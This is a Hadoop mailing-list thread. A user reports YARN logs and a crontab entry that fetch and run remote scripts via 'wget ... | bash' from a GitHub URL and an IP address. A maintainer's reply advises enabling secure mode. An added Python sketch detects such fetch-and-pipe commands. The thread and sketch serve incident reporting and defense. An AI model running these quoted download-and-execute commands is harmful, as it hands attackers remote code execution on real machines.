Hi Cliff!

That looks like the result of an automated scan + exploit tool. Presuming your 
cluster is not using Kerberos and is accessible from the outside world, it's 
only a matter of time before malicious users submit jobs like this.

Please see the following guide on securing your Hadoop cluster:

http://hadoop.apache.org/docs/r2.7.6/hadoop-project-dist/hadoop-common/SecureMode.html

The PMC has notified GitHub about the malicious user account and they are 
looking to shut it down.

Additionally, we encourage folks to subscribe to common-...@hadoop.apache.org 
and participate in a discussion on better securing things by default:

Subject: [DISCUSS]: securing ASF Hadoop releases out of the box

https://s.apache.org/5GeN

Thanks for notifying us about this activity!

-busbey

On 2018/07/03 13:56:28, Cliff Mattern <clifford.matt...@alphacarina.de> wrote: 
> Dear all,
> 
> We downloaded 
> http://www.apache.org/dyn/closer.cgi/hadoop/common/hadoop-2.7.6/hadoop-2.7.6.tar.gz
>  
> and installed the unpacked files as described. The md5 check was correct. 
> After a few days we found the following entries in the YARN log files:
> 
> 2018-06-29 05:37:21,490 INFO 
> org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: 
> Command to launch container container_1530169168373_1580_01_000001 : 
> wget -q -O - 
> https://raw.githubusercontent.com/zzgamond1/mygit/master/zz.sh | bash ...
> 2018-06-29 05:39:54,152 INFO 
> org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: 
> Command to launch container container_1530169168373_1583_01_000001 : 
> wget -q -O - 
> https://raw.githubusercontent.com/zzgamond1/mygit/master/zz.sh | bash & 
> disown
> 
> In the crontab we found the following single entry:
> 
> * * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1
> 
> We installed Hadoop 2.7.6 on two separate machines and got the same 
> behaviour. This all looks like a trojan is at work. What do you say to 
> this issue?
> 
> Kind regards,
> Cliff Mattern
> 
> -- 
> Clifford Mattern
> AlphaCarina Software GmbH
> Taunusturm 18.OG
> Taunustor 1
> 60310 Frankfurt am Main
> 
> Tel.: +49 (0)69 24 43 42-4395
> Fax: +49 (0)69 24 43 42-4150
> 
> e-Mail:clifford.matt...@alphacarina.de
> Internet:https://alphacarina.de/
> 
> HRB No. 2339 • Commercial Register Deggendorf
> Managing Director: Dipl.-Inf. Stephan Iglhaut
> 
> 

---------------------------------------------------------------------
To unsubscribe, e-mail: yarn-dev-unsubscr...@hadoop.apache.org
For additional commands, e-mail: yarn-dev-h...@hadoop.apache.org
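
A detection sketch for the log pattern quoted in this thread, added here as an example and not code from either poster or from the Hadoop project: it scans ResourceManager log text for AMLauncher launch commands that pipe a download into a shell, and applies the same check to crontab lines. It assumes the record layout shown in the quoted log, generalizes from `wget | bash` to `curl` and other shells, and runs on constructed sample input with placeholder hosts and container ids.

```python
import re

# Start of a log4j record, then the AMLauncher layout quoted in the thread above.
RECORD_START = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3} ")
LAUNCH = re.compile(r"^(?P<ts>\S+ \S+) INFO \S*AMLauncher: Command to launch "
                    r"container (?P<container>container_\S+) : (?P<cmd>.*)$")
# Downloader output piped straight into a shell (the pattern in both log lines).
FETCH_PIPE_SHELL = re.compile(r"\b(?:wget|curl)\b[^|;&]*\|\s*(?:ba|da|z)?sh\b")

def records(lines):
    """Re-join log records that were wrapped over several lines."""
    current = None
    for line in (l.strip() for l in lines):
        if RECORD_START.match(line):
            if current is not None:
                yield current
            current = line
        elif line and current is not None:
            current += " " + line
    if current is not None:
        yield current

def suspicious_launches(lines):
    """Return (timestamp, container id, command) for fetch-and-pipe launches."""
    hits = []
    for rec in records(lines):
        m = LAUNCH.match(rec)
        if m and FETCH_PIPE_SHELL.search(m["cmd"]):
            hits.append((m["ts"], m["container"], m["cmd"]))
    return hits

def suspicious_cron(lines):
    """Return non-comment crontab lines that fetch and pipe into a shell."""
    return [l.strip() for l in lines
            if not l.lstrip().startswith("#") and FETCH_PIPE_SHELL.search(l)]

# Constructed sample input (placeholder hosts and container ids, not real data).
SAMPLE_RM_LOG = """\
2018-06-29 05:37:21,490 INFO
org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher:
Command to launch container container_1500000000000_0007_01_000001 :
wget -q -O - https://example.invalid/a.sh | bash
2018-06-29 05:39:54,152 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command to launch container container_1500000000000_0008_01_000001 : curl -s https://example.invalid/a.sh | sh & disown
2018-06-29 06:00:00,000 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command to launch container container_1500000000000_0009_01_000001 : $JAVA_HOME/bin/java org.apache.hadoop.mapreduce.v2.app.MRAppMaster
"""
SAMPLE_CRONTAB = "# m h dom mon dow command\n* * * * * wget -q -O - http://192.0.2.10/c.sh | sh > /dev/null 2>&1\n"

if __name__ == "__main__":
    print(suspicious_launches(SAMPLE_RM_LOG.splitlines()))
    print(suspicious_cron(SAMPLE_CRONTAB.splitlines()))
```

A hit only shows that such a job was accepted; the fix remains the one given in the reply, restricting outside access and enabling secure mode.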
